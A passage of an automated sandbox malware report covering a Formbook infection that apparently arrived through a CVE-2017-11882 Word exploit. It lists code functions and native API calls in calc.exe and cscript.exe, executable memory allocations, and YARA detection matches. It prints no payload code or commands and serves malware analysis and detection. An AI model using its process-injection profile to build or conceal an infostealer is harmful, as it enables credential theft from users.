Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B7286D	11_2_00B7286D
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5C85C	11_2_00B5C85C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B529B2	11_2_00B529B2
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BF098E	11_2_00BF098E
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B669FE	11_2_00B669FE
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BD5955	11_2_00BD5955
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00C03A83	11_2_00C03A83
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BFCBA4	11_2_00BFCBA4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4FBD7	11_2_00B4FBD7
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BDDBDA	11_2_00BDDBDA
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B77B00	11_2_00B77B00
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BEFDDD	11_2_00BEFDDD
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B80D3B	11_2_00B80D3B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B5CD5B	11_2_00B5CD5B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B82E2F	11_2_00B82E2F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B6EE4C	11_2_00B6EE4C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00BECFB1	11_2_00BECFB1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B60F3F	11_2_00B60F3F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B7DF7C	11_2_00B7DF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02381238	13_2_02381238
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DE2E9	13_2_022DE2E9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E2305	13_2_022E2305
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0232A37B	13_2_0232A37B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E7353	13_2_022E7353
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DF3CF	13_2_022DF3CF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_023063DB	13_2_023063DB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0230D005	13_2_0230D005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E3040	13_2_022E3040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F905A	13_2_022F905A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DE0C6	13_2_022DE0C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02382622	13_2_02382622
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E4680	13_2_022E4680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022EE6C1	13_2_022EE6C1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022EC7BC	13_2_022EC7BC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0236579A	13_2_0236579A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_023157C3	13_2_023157C3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0231D47D	13_2_0231D47D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F1489	13_2_022F1489
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02315485	13_2_02315485
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E351F	13_2_022E351F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02326540	13_2_02326540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022FC5F0	13_2_022FC5F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02393A83	13_2_02393A83
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02307B00	13_2_02307B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0238CBA4	13_2_0238CBA4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0236DBDA	13_2_0236DBDA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022DFBD7	13_2_022DFBD7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0230286D	13_2_0230286D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022EC85C	13_2_022EC85C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0237F8EE	13_2_0237F8EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02365955	13_2_02365955
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022E29B2	13_2_022E29B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0238098E	13_2_0238098E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F69FE	13_2_022F69FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02312E2F	13_2_02312E2F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022FEE4C	13_2_022FEE4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022F0F3F	13_2_022F0F3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0230DF7C	13_2_0230DF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_02310D3B	13_2_02310D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022ECD5B	13_2_022ECD5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0237FDDD	13_2_0237FDDD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008E814	13_2_0008E814
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008EB8A	13_2_0008EB8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00072D90	13_2_00072D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00079E5B	13_2_00079E5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00079E60	13_2_00079E60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00072FB0	13_2_00072FB0

Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPED	Matched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPED	Matched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html

Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B4E2A8 appears 38 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B9373B appears 238 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B93F92 appears 132 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00BBF970 appears 81 times
Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 00B4DF5C appears 118 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0234F970 appears 81 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 02323F92 appears 108 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0232373B appears 238 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 022DE2A8 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 022DDF5C appears 118 times

Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A360 NtCreateFile,	11_2_0041A360
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A410 NtReadFile,	11_2_0041A410
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A490 NtClose,	11_2_0041A490
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A540 NtAllocateVirtualMemory,	11_2_0041A540
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A35A NtReadFile,	11_2_0041A35A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_0041A48A NtClose,	11_2_0041A48A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B400C4 NtCreateFile,LdrInitializeThunk,	11_2_00B400C4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40078 NtResumeThread,LdrInitializeThunk,	11_2_00B40078
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40048 NtProtectVirtualMemory,LdrInitializeThunk,	11_2_00B40048
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F9F0 NtClose,LdrInitializeThunk,	11_2_00B3F9F0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F900 NtReadFile,LdrInitializeThunk,	11_2_00B3F900
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FAE8 NtQueryInformationProcess,LdrInitializeThunk,	11_2_00B3FAE8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_00B3FAD0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FBB8 NtQueryInformationToken,LdrInitializeThunk,	11_2_00B3FBB8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FB68 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_00B3FB68
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC90 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_00B3FC90
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC60 NtMapViewOfSection,LdrInitializeThunk,	11_2_00B3FC60
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FD8C NtDelayExecution,LdrInitializeThunk,	11_2_00B3FD8C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FDC0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_00B3FDC0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FEA0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_00B3FEA0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_00B3FED0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FFB4 NtCreateSection,LdrInitializeThunk,	11_2_00B3FFB4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B410D0 NtOpenProcessToken,	11_2_00B410D0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40060 NtQuerySection,	11_2_00B40060
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B401D4 NtSetValueKey,	11_2_00B401D4
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B4010C NtOpenDirectoryObject,	11_2_00B4010C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B41148 NtOpenThread,	11_2_00B41148
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B407AC NtCreateMutant,	11_2_00B407AC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F8CC NtWaitForSingleObject,	11_2_00B3F8CC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B41930 NtSetContextThread,	11_2_00B41930
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3F938 NtWriteFile,	11_2_00B3F938
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FAB8 NtQueryValueKey,	11_2_00B3FAB8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FA20 NtQueryInformationFile,	11_2_00B3FA20
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FA50 NtEnumerateValueKey,	11_2_00B3FA50
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FBE8 NtQueryVirtualMemory,	11_2_00B3FBE8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FB50 NtCreateKey,	11_2_00B3FB50
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC30 NtOpenProcess,	11_2_00B3FC30
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B40C40 NtGetContextThread,	11_2_00B40C40
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FC48 NtSetInformationFile,	11_2_00B3FC48
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B41D80 NtSuspendThread,	11_2_00B41D80
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FD5C NtEnumerateKey,	11_2_00B3FD5C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FE24 NtWriteVirtualMemory,	11_2_00B3FE24
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FFFC NtCreateProcessEx,	11_2_00B3FFFC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FF34 NtQueueApcThread,	11_2_00B3FF34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D00C4 NtCreateFile,LdrInitializeThunk,	13_2_022D00C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D07AC NtCreateMutant,LdrInitializeThunk,	13_2_022D07AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFAB8 NtQueryValueKey,LdrInitializeThunk,	13_2_022CFAB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFAE8 NtQueryInformationProcess,LdrInitializeThunk,	13_2_022CFAE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_022CFAD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFB68 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_022CFB68
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFB50 NtCreateKey,LdrInitializeThunk,	13_2_022CFB50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFBB8 NtQueryInformationToken,LdrInitializeThunk,	13_2_022CFBB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF900 NtReadFile,LdrInitializeThunk,	13_2_022CF900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF9F0 NtClose,LdrInitializeThunk,	13_2_022CF9F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_022CFED0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFFB4 NtCreateSection,LdrInitializeThunk,	13_2_022CFFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC60 NtMapViewOfSection,LdrInitializeThunk,	13_2_022CFC60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFD8C NtDelayExecution,LdrInitializeThunk,	13_2_022CFD8C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFDC0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_022CFDC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0060 NtQuerySection,	13_2_022D0060
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0078 NtResumeThread,	13_2_022D0078
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0048 NtProtectVirtualMemory,	13_2_022D0048
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D10D0 NtOpenProcessToken,	13_2_022D10D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D010C NtOpenDirectoryObject,	13_2_022D010C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D1148 NtOpenThread,	13_2_022D1148
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D01D4 NtSetValueKey,	13_2_022D01D4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFA20 NtQueryInformationFile,	13_2_022CFA20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFA50 NtEnumerateValueKey,	13_2_022CFA50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFBE8 NtQueryVirtualMemory,	13_2_022CFBE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF8CC NtWaitForSingleObject,	13_2_022CF8CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF938 NtWriteFile,	13_2_022CF938
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D1930 NtSetContextThread,	13_2_022D1930
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFE24 NtWriteVirtualMemory,	13_2_022CFE24
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFEA0 NtReadVirtualMemory,	13_2_022CFEA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFF34 NtQueueApcThread,	13_2_022CFF34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFFFC NtCreateProcessEx,	13_2_022CFFFC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC30 NtOpenProcess,	13_2_022CFC30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC48 NtSetInformationFile,	13_2_022CFC48
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0C40 NtGetContextThread,	13_2_022D0C40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC90 NtUnmapViewOfSection,	13_2_022CFC90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFD5C NtEnumerateKey,	13_2_022CFD5C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D1D80 NtSuspendThread,	13_2_022D1D80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A360 NtCreateFile,	13_2_0008A360
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A410 NtReadFile,	13_2_0008A410
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A490 NtClose,	13_2_0008A490
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A540 NtAllocateVirtualMemory,	13_2_0008A540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A35A NtReadFile,	13_2_0008A35A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A48A NtClose,	13_2_0008A48A

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	OLE document summary: edited time not present or 0

